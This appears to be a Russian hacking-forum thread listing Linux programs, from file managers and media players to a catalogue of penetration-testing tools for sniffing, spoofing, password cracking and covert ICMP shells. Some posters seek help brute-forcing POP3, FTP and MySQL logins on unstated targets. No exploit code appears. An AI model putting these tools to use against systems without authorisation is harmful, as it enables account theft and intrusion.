Лицензия:
Проприетарное программное обеспечение
Greets:
c411k (https://forum.antichat.ru/member.php?userid=17918)
Линки для закачки:
cedega-engine-6.0.3-local-update.i386.cpkg (http://lanham.nm.ru/cedega/cedega-engine-6.0.3-local-update.i386.cpkg)
cedega-small-6.0.2.tgz (http://lanham.nm.ru/cedega/cedega-small-6.0.2.tgz)

Название проги:
MemTest
Тип проги:
Тестирования памяти
Подробное описание:
Программа для тестирования памяти для х86 и Pentium систем. Текущая версия выполняет 10 тестов, определяя корректность работы памяти.
Скачать (http://www.memtest86.com/download.html)

Название проги:
Krusader
Тип проги:
Файловый менеджер
Подробное описание:
Файловый менеджер в лучших традициях Midnight Commander, FAR, Disco Commander, etc. Требует KDE 2.1.1.
Скачать (http://krusader.sourceforge.net/)

Название проги:
EmelFM
Тип проги:
Файловый менеджер
Подробное описание:
Еще один известный файловый менеджер с двумя окнами. Мало занимает и может работать в любой графической среде.
Скачать (http://linux.davecentral.com/projects/emelfm/)

Название проги:
KuickShow
Тип проги:
Просмотр изображений
Подробное описание:
Один из самых лучших и быстрых view'еров графических изображений. Аналог легендарного ACDSee.
Скачать (http://kuickshow.sourceforge.net/)

Название проги:
make_uninstall
Тип проги:
Отслеживание команд
Подробное описание:
Архиважная прога! Она отслеживает команды типа make install, записывает, что куда "покладено", чтоб затем установленное приложение можно было быстро удалить.
Скачать (http://ibiblio.org/pub/Linux/utils/package)

какой-нибудь pop3 brut , ИМХО гидра не вытягивает, может и руки не совсем ровные...

"Тренируемся на кошках ;) " Damn Vulnerable Linux (DVL)
офф сайт
https://www.damnvulnerablelinux.org
(нужна регистрация, после чего можно скачать дистрибутив "дырявого" linux'са)
более подробно на офф сайте
(!ресурс на анг. яз!)
##########################################
Damn Vulnerable Linux (DVL) is a Linux-based tool for IT-Security. It was initiated for training tasks during university lessons by the IITAC (International Institute for Training, Assessment, and Certification) and S²e - Secure Software Engineering in cooperation with the French Reverse Engineering Team. Visit their websites at http://www.iitac.org, http://www.Secure-Software-Engineering.com , and http://www.binary-reverser.org/ . Main authors are Univ.-Doz. Dr. Thorsten Schneider [IITAC, S²e] and Kryshaam [French Reverse Enginering Team].
##########################################
Дистрибутив, цель которого собрать в себе как можно больше программ с неисправленными проблемами безопасности. DVL - замечательная тестовая площадка для начинающих изучать проблемы безопасности и желающих обнаружить проблему самостоятельно (в состав дистрибутива входят разнообразные средства для отладки) или оценить в действии различные эксплоиты. Дистрибутив подготовлен несколькими преподавателями в качестве демонстрационного материала к лекциям.
------------------------------
Можно поставить виртуальный сервачек и тренироваться, испытывая на виртуальной тачке всякие ядо-химикаты без ущерба для здоровья ;)
зы на сайте еще много всяких вкусностей туториалы и пр.. :)

Miro for Linux 1.2.1 - Многоплатформенный мультимедийный плеер с опцией поиска и закачки видео с YouTube, Google Video, Yahoo Video, Blogdigger и других подобных сайтов. Имеется функция организации и управления мультимедийной коллекцией.



..................... (http://ftp.osuosl.org/pub/pculture.org/miro/src/Miro-1.2.1.tar.gz)

В Дебиане\Убунте давно в репозиторие есть.
sudo apt-get install miro

миро очь прикольная штука если инет скоростной, много интересного видео!
2 дня юзаю очь нравица

Burp Suite is an integrated platform for attacking and testing web applications. It contains the latest versions of all the Burp tools, including:
* Burp Proxy
* Burp Spider
* Burp Intruder
* Burp Repeater
* Burp Sequencer
* Burp Decoder
* Burp Comparer
All of the Suite tools are tightly integrated, with numerous interfaces designed to facilitate and speed up the process of attacking an application.
the use "/usr/bin/java -jar /usr/tools/burpsuite_v1.1.jar".
http://portswigger.net/suite/burpsuite_v1.1.tar.gz
---------------------------------------------------------------------
JBroFuzz is a stateless network protocol fuzzer that emerged from the needs of penetration testing. Written in Java, it allows for the identification of certain classess of security vulnerabilities, by means of creating malformed data and having the network protocol in question consume the data.
the use "/usr/bin/java -jar /usr/tools/jbrofuzz-08.jar".
http://sourceforge.net/projects/jbrofuzz
home http://www.owasp.org/index.php/Category:OWASP_JBroFuzz
-----------------------------------------------------------------------
onesixtyone -The SNMP protocol is a stateless, datagram oriented protocol. An SNMP scanner is a program that sends SNMP requests to multiple IP addresses, trying different community strings and waiting for a reply. Unfortunately SNMP servers don't respond to requests with invalid community strings and the underlying UDP protocol does not reliably report closed UDP ports. This means that 'no response' from the probed IP address can mean either of the following:
* machine unreachable
* SNMP server not running
* invalid community string
* the response datagram has not yet arrived

http://www.phreedom.org/solar/onesixtyone/
------------------------------------------------------------------------
WebScarab is a framework for analysing applications that communicate using the HTTP and HTTPS protocols. It is written in Java, and is thus portable to many platforms. WebScarab has several modes of operation, implemented by a number of plugins. In its most common usage, WebScarab operates as an intercepting proxy, allowing the operator to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. WebScarab is able to intercept both HTTP and HTTPS communication. The operator can also review the conversations (requests and responses) that have passed through WebScarab.
the use "/usr/bin/java -jar /usr/tools/webscarab.jar".
http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=61823
home http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
------------------------------------------------------------------------
w3af is a Web Application Attack and Audit Framework. w3af core and it's plugins are are fully written in =>> python. The project has more than 125 plugins, which check for sql injection, cross site scripting (xss), remote file inclusion and more.
http://w3af.sourceforge.net/
-----------------------------------------------------------------------
Yersinia is a network tool designed to take advantage of some weakeness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.
Currently, there are some network protocols implemented, but others are coming (tell us which one is your preferred). Attacks for the following network protocols are implemented (but of course you are free for implementing new ones):
* Spanning Tree Protocol (STP)
* Cisco Discovery Protocol (CDP)
* Dynamic Trunking Protocol (DTP)
* Dynamic Host Configuration Protocol (DHCP)
* Hot Standby Router Protocol (HSRP)
* IEEE 802.1Q
* IEEE 802.1X
* Inter-Switch Link Protocol (ISL)
* VLAN Trunking Protocol (VTP)
http://www.yersinia.net/
-----------------------------------------------------------------------
Xprobe2 allows you to determine what operating system is running on a
remote host. It sends several packets to a host and analyses the
returned answers.
Xprobe2's functionality is comparable to the OS fingerprinting feature
in nmap (written by a different Fyodor):
- Outputs its level of confidence about the OS on the remote host.
- Remains usable even if intermediate systems (routers, firewalls) make
slight modifications to the packets.
- Can list the type of intermediate device (e.g. "Linux IP masquerading").
- Modular architecture allows new fingerprinting tests and new OS
signatures to be added.
http://sys-security.com/blog/xprobe2/
----------------------------------------------------------------------
Netwox
Toolbox netwox helps to find and solve network problems.
It provides more than 200 tools :
- sniff, spoof
- clients, servers
- DNS, FTP, HTTP, IRC, NNTP, SMTP, SNMP, SYSLOG, TELNET, TFTP
- scan, ping traceroute
- etc.
http://www.laurentconstantin.com/en/netw/netwox/
-----------------------------------------------------------------------
Nast
Can sniff in normal mode or in promiscuous mode the packets on a network
interface and log it. It dumps the headers of packets and the payload in
ascii or ascii-hex format. You can apply a filter. The sniffed data can
be saved in a separated file.
As analyzer tool, it has many features like:
* Build LAN hosts list
* Follow a TCP-DATA stream
* Find LAN internet gateways
* Discover promiscuous nodes
* Reset an established connection
* Perform a single half-open portscanner
* Perform a multi half-open portscanner
* Find link type (hub or switch)
* Catch daemon banner of LAN nodes
* Control arp answers to discover possible arp-spoofings
* Byte counting with an optional filter
* Write reports logging
http://nast.berlios.de/
----------------------------------------------------------------------
dsniff-Various tools to sniff network traffic for cleartext insecurities
This package contains several tools to listen to and create network traffic:
* arpspoof - Send out unrequested (and possibly forged) arp replies.
* dnsspoof - forge replies to arbitrary DNS address / pointer queries
on the Local Area Network.
* dsniff - password sniffer for several protocols.
* filesnarf - saves selected files sniffed from NFS traffic.
* macof - flood the local network with random MAC addresses.
* mailsnarf - sniffs mail on the LAN and stores it in mbox format.
* msgsnarf - record selected messages from different Instant Messengers.
* sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
* sshow - SSH traffic analyser.
* tcpkill - kills specified in-progress TCP connections.
* tcpnice - slow down specified TCP connections via "active"
traffic shaping.
* urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
* webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.
* webspy - sends URLs sniffed from a client to your local browser
(requires libx11-6 installed).
http://www.monkey.org/~dugsong/dsniff/
-----------------------------------------------------------------------
Ophcrack-Microsoft Windows password cracker using rainbow tables
Ophcrack is a Windows password cracker based on a time-memory trade-off
using rainbow tables. This is a new variant of Hellman's original trade-off,
with better performance. It recovers 99.9% of alphanumeric passwords in
seconds.
http://ophcrack.sourceforge.net/
--------------------------------------------------------------------
The Offline NT Password Editor
This little program will enable you to view some information and
change user passwords in a Windows NT SAM userdatabase file.
You do not need to know the old passwords.
It works for Windows NT/2000/XP/Vista.
http://home.eunet.no/~pnordahl/ntpasswd/binsrc.html
---------------------------------------------------------------------
MetaCoretex is an entirely JAVA vulnerability scanning framework which
puts special emphasis on databases. Probe objects are written in JAVA
by means of an easy to extend AbstractProbe class. Additionally, probe
generators make the process of writting simple probes almost automagic.
http://sourceforge.net/projects/metacoretex/
----------------------------------------------------------------------
Oracle Auditing Tools
The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers.
http://www.cqure.net/wp/?page_id=2
----------------------------------------------------------------------
Lodowep is a tool for analyzing password strength of accounts on a Lotus Domino webserver system. The tool supports both session- and basic-authentication. It runs 20 simultaneous connection guessing passwords specified in a dictionaryfile against the supplied userfile. The tool is written in java and is released under.
http://www.cqure.net/wp/?page_id=17
----------------------------------------------------------------------
Passifist |Passifist is a tool for passive network discovery. It could be used for a number of different things, but was mainly written to discover hosts without actively probing a network. The tool analyzes broadcast traffic and has a plugin architecture through which it dissects and reports services found.
http://www.cqure.net/wp/?page_id=19
----------------------------------------------------------------------
SMBAT
The SMB Auditing Tool is a password auditing tool for the Windows-and the SMB-platform. It makes it possible to exploit the timeout architecture bug in Windows 2000/XP, making it extremly fast to guess passwords on these platforms. Running a large password file against Windows 2000/XP, shows statistics up to 1200 logins/sec. This means that you could run a commonly used English dictionary with 53 000 words against a server under a minute.
http://www.cqure.net/wp/?page_id=10
-----------------------------------------------------------------------
SIPcrack is a suite of tools to sniff and crack the digest authentications that are used within the SIP protocol.
The tools offer support for pcap files, wordlists and many more to extract all needed information and bruteforce the passwords for the sniffed accounts.

bed (aka 'Bruteforce Exploit Detector') is a plain-text protocol fuzzer that checks software for common vulnerabilities like buffer overflows, format string bugs, integer overflows, etc.
Supported protocols: finger, ftp, http, imap, irc, lpd, pjl, pop, smtp, socks4 and socks5

Wyd is a password profiling tool that extracts words/strings from supplied files and directories.
It parses files according to the file-types and extracts the useful information, e.g. song titles, authors and so on from mp3's or descriptions and titles from images.
It supports the following filetypes: plain, html, php, doc, ppt, mp3, pdf, jpeg, odp/ods/odp and extracting raw strings.

icmpshell is a client/server software that enables remote access to UNIX systems. It abuses ICMP for the communication to create a covert channel.
The used ICMP codes and types can be manually specified, e.g. ICMP_ECHO for one side and ICMP_ECHOREPLY for the other to hide the conversation more realistic.
The payload of the ICMP packet contains the actual data and is encrypted using the AES-256bit algorithm with a SHA-256bit hash of an user-given password.
http://www.codito.de/
-----------------------------------------------------------------------
Inguma
Free Penetration Testing and Vulnerability Research Toolkit.
p.s Inguma version 0.0.7.2 has been released. In this version I have added new modules and exploits, fixed many, many, many bugs as well as enhancing existing modules, such as the Oracle related stuff.
PyShellcodelib has been enhanced as well and now supports Mac OS X. But, for the moment, just BSD syscalls. Mach syscalls implementation is on the way. You will also notice that it is now object oriented as opossed to the previous versions.
Among with the aforementioned changes, I'm releasing 5 new Oracle modules: 4 modules for bugs fixed in the Critical Patch Update of January 2008 and one skr1pT k1|>i3 like module for the Oracle PL/SQL gateway flaw. Give to the module the target's address and port and run "oragateway". The module will automagically guess the correct DAD and bypass technique. After it an SQL terminal will be opened.
http://inguma.sourceforge.net/
-------------------------------------------------------------------------
WepLab is a tool designed to teach how WEP works, what different vulnerabilities it has, and how they can be used in practice to break a WEP protected wireless network. So far, WepLab more than a Wep Key Cracker, is a Wep Security Analyzer designed from an educational point of view. The author has tried to leave the source code as clear as possible, running away from optimizations that would obfuscate it.
http://weplab.sourceforge.net/
-----------------------------------------------------------------------
WiFitao injection tool through tun/tap device
http://sid.rstack.org/index.php/Wifitap_EN
-----------------------------------------------------------------------
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and infering the presence of nonbeaconing networks via data traffic.
http://www.kismetwireless.net/

Название проги:
Websec
Тип проги:
Cледит за обновлениями сайтов
Подробное описание:
Websec («веб-секретарь») автоматизирует постоянное посещение сайта: он обычно запускается в задаче cron и сравнивает содержимое страницы с тем, что было получено в предыдущий раз. Если что-то поменялось, страница с выделенными добавлениями будет выслана вам по электронной почте.
Линк для закачки:
Домашняя страница http://baruch.ev-en.org/proj/websec/


Название проги:
MyTop
Тип проги:
top для MySQL
Подробное описание:
Это клон top, но он следит не за системой, а за потоками MySQL. Это отличная утилита командной строки, которая подключается к серверу MySQL, периодически выполняет команды SHOW PROCESSLIST, SHOW STATUS и отображает сводные результаты, к которым можно применять различные фильтры.
Линк для закачки:
есть в репозитариях Debian и Ubuntu


Название проги:
HTTrack
Тип проги:
Скачивание и зеркалирование сайтов
Подробное описание:
HTTrack обходит ссылки указанного ресурса, рекурсивно загружает страницы и меняет ссылки в гипертексте так, чтобы все можно было просматривать со своего компьютера. Функция рекурсивного зеркалирования, напротив, предполагает, что ссылки не меняются и продолжают указывать на удаленные ресурсы.
Линк для закачки:
http://httrack.com/


Название проги:
Clusterssh
Тип проги:
Работа с несколькими сеансами SSH через общий интерфейс
Подробное описание:
Clusterssh — программа с графическим интерфесом, позволяющая открыть несколько соединений по SSH и выполнять одновременно во всех них команды.
Линк для закачки:
есть в репозитариях Debian и Ubuntu


Название проги:
Trickle
Тип проги:
простой ограничитель пропускной способности
Подробное описание:
Trickle — пользовательский ограничитель пропускной способности. Он позволяет ограничить расходы соединения без каких-то патчей ядра, настроек фаерволла и прав суперпользователя. Trickle может ограничивать пропускную способность для нескольких программ одновременно или для одной указанной программы.
Линк для закачки:
http://monkey.org/%7Emarius/pages/?page=trickle

http://wiki.opennet.ru/Windows2Linux

Аналоги windows программ для Linux

Название проги:
ipcalc
Тип проги:
Расчета адресов в подсети и сетевых масок
Подробное описание:
На примере:

$ ipcalc 192.168.0.0 0.0.0.3
WILDCARD
Address: 192.168.0.0 11000000.10101000.00000000.000000 00
Netmask: 255.255.255.252 = 30 11111111.11111111.11111111.111111 00
Wildcard: 0.0.0.3 00000000.00000000.00000000.000000 11
=>
Network: 192.168.0.0/30 11000000.10101000.00000000.000000 00
HostMin: 192.168.0.1 11000000.10101000.00000000.000000 01
HostMax: 192.168.0.2 11000000.10101000.00000000.000000 10
Broadcast: 192.168.0.3 11000000.10101000.00000000.000000 11
Hosts/Net: 2 Class C, Private Internet

Домашняя страница:
jodies.de/ipcalc

cd /usr/ports/net-mgmt/ipcalc/ && make install clean
pacman -S ipcalc
apt-get install ipcalc
И т.д.

Вот нашел интересный проект - Turnkey (www.turnkeylinux.org)
Если в двух словах : 40 ISO-образов минимального размера , различной конфигурации для тех кто балуется виртуальными машинами и не только .....
Каждый образ заточенных под индивидуальную задачу.
Скачал образ (180 Мб) с установленым мускулом апачем и вордпресом ,запустил..
установка заняла 15 минут и вот в мох руках готовый мини-сервак с нужными мне приложениями..
В общем то для тех кто в" курсе" и нехочет терять свое драгоценное время .

В общем то для тех кто в" курсе" и нехочет терять свое драгоценное время
имеется ввиду, что человеку уже неинтересен процес установки софта...
что вы там надумали себе , непонятно :confused: , уважаемый ...

имеется ввиду, что человеку уже неинтересен процес установки софта...
что вы там надумали себе , непонятно , уважаемый ФЛУДЕР..
Ололо...
Проще найти дыры в системе чем установить ЛАМП?
Мне понятна ваша позиция. (тред закончен.

farex, для виртуальных машин удобно:) зря вы так, вирт машину "хекать" никто не будет, плюс для локальных серверов, например отладка тех же веб-приложений вне рабочего места..
но согласен, ставить такое на "боевой серв" или свою машину - бррр... :)

имеется ввиду, что человеку уже неинтересен процес установки софта...

О каком интересе вы говорите? при настройке нет такого понятия - есть только "Нужно" и "Безопасно" если вам не интересно то вам не место в этой области

Вы так думаете?
А тот факт что добрая половина (а может и больше) серверов сидит именно на виртуалках вас не настораживает?
я писал, что ставить на "боевой сервер", это творение не стоит, не зависимо от того, какой-он виртуальный или реальный, а вот помочь в некоторых ситуациях может, опять таки работа с веб-приложениями вне рабочего места, напрашивается, как пример, хотя конечно для таких целей легче и лучше сделать Linux-флешку :)
Вобщем, найти разумное применение можно всему :) (ИМХО, разумеется..)

Вот такая шляпа,так же и при бруте фтп и мускула,шо делать хз

http://s45.radikal.ru/i110/0911/1e/d068c5172ec8t.jpg (http://radikal.ru/F/s45.radikal.ru/i110/0911/1e/d068c5172ec8.jpg.html)

привет.что сканит ((NMAP)).Он очень нужен или есть лучший

привет.что сканит ((NMAP)).Он очень нужен или есть лучший
1нмап сканит порты
2 он лучший

Вышла новая версия антивируса F-PROT для Linux. Программа способна производить сканирование жестких дисков, дискет, сетевых дисков, файлов на CD/DVD, находить макровирусы и троянов. Можно запускать сканирование по расписанию.
http://i061.radikal.ru/1001/49/396dadf0ebf1.gif (http://www.radikal.ru)
Шестая версия программы включает новую версию движка сканирования, которая значительно отличается от той, которая использовалась в пятом релизе. Кроме этого, определения вирусов теперь хранятся в одном файле, а не в трех, как это было раньше. Улучшена и процедура обновления.

Версия 6.0.3 содержит обновленный движок сканирования и уменьшает количество ложных срабатываний. Пользователи программы могут обновить ее до новой версии, зайдя на эту страницу (http://subscription.f-prot.com/login/index.html)

Привет, парни! Возник такой вопрос. Пытаюсь принять с модема на комп строчку кода для прослушки юзаю netcat с параметрами nc.exe -v -L -s 133.151.77.14 -p 5203 -o in02.txt

должен прийти код и в ответ надо отправить ему 01

вот как это сделать?

мне выдаёт ошибку

E:\>nc.exe -v -L -s 193.227.250.104 -p 5203 -o in02.txt
listening on [193.227.250.104] 5203 ...
connect to [193.227.250.104] from 131-185-92-178.pool.ukrtel.net [178.92.185.131
] 4097
☼353976014175412
can't open < 00000010 32 # 2
35397601417541
: unknown socket error

пробовал уже и прсто 01 и >> 01
нифига не получается. помогите )